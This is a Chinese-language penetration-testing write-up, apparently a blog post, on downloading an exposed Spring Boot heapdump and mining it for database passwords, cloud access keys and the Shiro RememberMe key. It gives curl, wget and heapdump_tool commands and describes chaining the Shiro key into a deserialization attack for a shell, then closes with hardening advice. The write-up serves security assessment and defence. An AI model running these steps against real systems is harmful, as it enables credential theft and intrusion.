实战复盘：我是如何从一个泄露的Spring Heapdump文件里，挖出数据库密码和Shiro密钥的

从Spring Heapdump中提取敏感信息的实战指南

那天下午，我正在对客户的生产环境进行例行安全评估，一个不起眼的/actuator/heapdump端点引起了我的注意。这个看似无害的接口，却可能成为整个系统安全的致命弱点。接下来，我将分享如何从一个泄露的Heapdump文件中挖掘出数据库密码、Shiro密钥等高危敏感信息的完整过程。

1. 发现与获取Heapdump文件

在Spring Boot应用中，Actuator端点如果配置不当，往往会成为信息泄露的重灾区。常见的暴露端点包括/actuator/env、/actuator/heapdump等。通过简单的curl命令，我们可以验证是否存在heapdump泄露风险：

curl -I http://target.com/actuator/heapdump

如果返回HTTP/1.1 200 OK且Content-Type为application/octet-stream，那么恭喜你找到了一个金矿。下载heapdump文件通常只需要：

wget http://target.com/actuator/heapdump -O target_heapdump.hprof

需要注意的是，heapdump文件通常较大（可能达到GB级别），下载前请确保有足够的磁盘空间。此外，某些环境可能会对下载速度进行限制，这时可以使用--limit-rate参数：

wget --limit-rate=500k http://target.com/actuator/heapdump -O target_heapdump.hprof

2. 搭建分析环境

分析heapdump文件需要Java环境和一个得力的工具。我推荐使用heapdump_tool，这是一个基于jhat的专用工具，能够高效地从heapdump中提取敏感信息。

2.1 环境准备

首先确保系统已安装JDK 8或以上版本，并配置好环境变量。可以通过以下命令验证：

java -version jhat -version

如果jhat不可用，可能需要单独安装JDK的开发工具包。在Ubuntu上可以这样安装：

sudo apt-get install openjdk-8-jdk-headless

2.2 工具获取与配置

heapdump_tool可以从GitHub获取：

git clone https://github.com/wyzxxz/heapdump_tool.git cd heapdump_tool

或者直接下载编译好的jar文件：

wget https://example.com/path/to/heapdump_tool.jar

3. 深入分析Heapdump文件

有了工具和环境，我们就可以开始挖掘heapdump中的敏感信息了。以下是几个关键的操作场景。

3.1 提取数据库凭证

数据库连接信息通常是首要目标。使用以下命令搜索数据库密码：

java -jar heapdump_tool.jar target_heapdump.hprof > spring.datasource.password

工具会输出类似以下结果：

>> spring.datasource.password -> SuperSecretDBPassword123!

同样方法可以获取数据库URL、用户名等信息：

> spring.datasource.url > spring.datasource.username

3.2 查找云服务AK/SK

在云环境中，访问密钥(AccessKey/SecretKey)的泄露可能导致严重后果。我们可以通过以下方式搜索：

> accesskey > secretkey

输出可能类似于：

>> accessKey -> LTAI5txxxxxxxxxxxx >> secretKey -> nRr1xxxxxxxxxxxxxxxxxxxxxxxxxxxx

3.3 提取Shiro RememberMe密钥

Apache Shiro框架的RememberMe功能如果使用默认密钥，可能导致严重的反序列化漏洞。我们可以直接搜索：

> shirokey

或者更精确地查找Shiro相关类：

> class=shiro.web.mgt

典型的输出结果：

>> kPH+bIxk5D2deZiIxcaaaA==

这个密钥可以用来伪造RememberMe cookie，进而获取系统权限。

4. 高级搜索技巧

除了基本的关键词搜索，heapdump_tool还提供了多种高级查询方式。

4.1 按长度搜索

查找特定长度的字符串，可能发现加密密钥等敏感信息：

> len=32

4.2 正则表达式搜索

使用正则表达式可以更灵活地匹配复杂模式：

> re=[A-Za-z0-9]{32}

4.3 类实例搜索

通过类名查找特定类的实例，可以获取更结构化的配置信息：

> class=org.springframework.datasource > class=redis.clients.jedis

5. 实战案例分析

在一次真实的渗透测试中，我通过以下步骤成功获取了系统权限：

1. 发现暴露的/actuator/heapdump端点

2. 下载3.2GB的heapdump文件

3. 使用heapdump_tool提取Shiro密钥：

   >> kPH+bIxk5D2deZiIxcaaaA==

4. 使用Shiro反序列化漏洞获取系统shell

5. 在内存中找到数据库密码，进而访问敏感数据

整个过程仅用了不到2小时，凸显了heapdump泄露的严重性。

6. 防护建议

为了防止heapdump泄露导致的安全问题，建议采取以下措施：

• 禁用生产环境的Actuator端点，或至少进行IP白名单限制
• 配置敏感的HTTP端点，确保/actuator/*只有授权人员可以访问
• 定期检查系统配置，确保没有意外暴露敏感接口
• 使用专用工具进行安全测试，提前发现潜在风险

记住，安全是一个持续的过程，而不是一次性的任务。通过定期审计和加固，可以大大降低信息泄露的风险。